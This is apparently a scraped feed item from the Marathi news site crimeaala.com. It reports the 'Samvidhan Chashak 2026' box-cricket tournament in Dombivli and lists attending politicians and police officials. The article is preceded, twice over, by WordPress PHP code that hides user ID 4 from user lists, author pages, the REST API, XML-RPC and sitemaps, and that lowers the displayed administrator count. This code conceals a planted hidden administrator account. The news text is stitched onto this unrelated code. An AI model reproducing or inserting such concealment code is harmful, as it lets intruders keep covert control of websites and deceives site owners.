add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post “संविधान चषक -२०२६” या स्पर्धेसाठी आमदार राजेश मोरे व पोलिस उपायुक्त अतुल झेंडे सर यांनी लावली हजेरी… first appeared on crimeaala.com.
]]>
डोंबिवली (प्रतिनिधी) : लोढाहेवन निळजे येथील बौद्धजन पंचायत समिती शाखा क. ७११ पंचशिल सामाजिक संस्था (रजि.)पंचशिल महिला मंडळ यांच्या संयुक्त विद्यमाने भव्य नाईट अंडर-आर्म बॉक्स क्रिकेट स्पर्धा अर्थात….”संविधान चषक -२०२६” या स्पर्धेचे २१ व २२ मार्च,२०२६ रोजी,आयोजन करण्यात आले होते.
या स्पर्धेचे उद्घाटक व प्रमुख अतिथी राजेशजी मोरे (आमदार,कल्याण ग्रामीण),अतुलजी झेंडे सर (पोलीस उपायुक्त,परिमंडळ ३,कल्याण),ऍड हर्षाली विजय चौधरी- थविल (महापौर,कल्याण डोंबिवली मनपा.),राहुल दामले (उपमहापौर,कल्याण डोंबिवली मनपा.) राजूदादा पाटील (माजी आमदार),विनोद रतन पाटील (अध्यक्ष -क्रिकेट असोसिएशन,कल्याण ग्रामीण),गजानन मोतीराम पाटील (नगरसेवक,प्रभाग क्रमांक ३१),सौ शैलेजा लालचंद भोईर (नगरसेविका प्रभाग क्रमांक ३१) यांना आमंत्रित करण्यात आले होते.

संविधान चषक २०२६ या स्पर्धेसाठी खासकरून आमदार राजेशजी मोरे तसेच अतुलजी झेंडे सर (पोलीस उपायुक्त,परिमंडळ ३,कल्याण),सुहास हेमाडे (पोलीस सहआयुक्त),संदिपान शिंदे,(वरिष्ठ पोलीस निरीक्षक,मानपाडा) यांना विशेष अतिथी म्हणून आमंत्रित होते.
स्पर्धेसाठी सामजिक क्षेत्रातील बाळाशेठ भोईर,घेसरगाव (उद्योगपती),नागेंद्र फौजदार शर्मा (उद्योगपती),प्रभाकर गोपीनाथ खरबे (उद्योगपती),काशिनाथशेठ पाटील (मा.उपसरपंच),लालचंद भोईर (माजी सरपंच),.तकदिर दशरथ काळण (मा.सरपंच),मा.निवृत्ती चंद्रकांत पाटील (मा.सरपंच),महेंद्र धर्मा पाटील (समाजसेवक),संतोष दीक्षित (उद्योजक),वीरेंद्र सिंग (उद्योजक),कैलास म्हात्रे (उद्योजक),शरद पाटील (उद्योजक), माणिकराव उघडे (रिपब्लिकन नेते),लक्ष्मणराव अंभोरे (रिपब्लिकन नेते),अनंता पाटील (समाजसेवक),.सुभाष अनंता पाटील (विभाग प्रमुख),साईनाथ भोईर (समाजसेवक),सुनील पाटील (जेष्ठ कवी),योगेश दराडे (समाजसेवक),शामराव यादव (समाजसेवक), देवाभाई भोईर,.मजोज भोईर (समाजसेवक),रामकृष्ण पाटील,मंगेश पाटील,ऍड विशाल वाडेकर,पत्रकार भानुदास गायकवाड,पत्रकार विनोद गिरी यांना देखील विशेष आमंत्रित करण्यात आले होते प्रसंगी बऱ्यापैकी आमंत्रित मंडळीनी संविधान चषक २०२६ या स्पर्धेसाठी आपली उपस्थिती दर्शविली.
संविधान चषक २०२६ या स्पर्धेसाठी आलेल्या प्रमुख पाहुण्यांचा यथोचित सन्मान तिन्ही संघटनेच्या वतीने तसेच नवतरुणांनी केला.शिवाय निळजे लोढाहेवन या परिसरात पहिल्यादाच “संविधान चषक २०२६” ही स्पर्धा भरविण्यात आली होती प्रसंगी या स्पर्धेला पहिल्याच वर्षी उत्तम प्रतिसाद मिळाला.
The post “संविधान चषक -२०२६” या स्पर्धेसाठी आमदार राजेश मोरे व पोलिस उपायुक्त अतुल झेंडे सर यांनी लावली हजेरी… first appeared on crimeaala.com.
]]>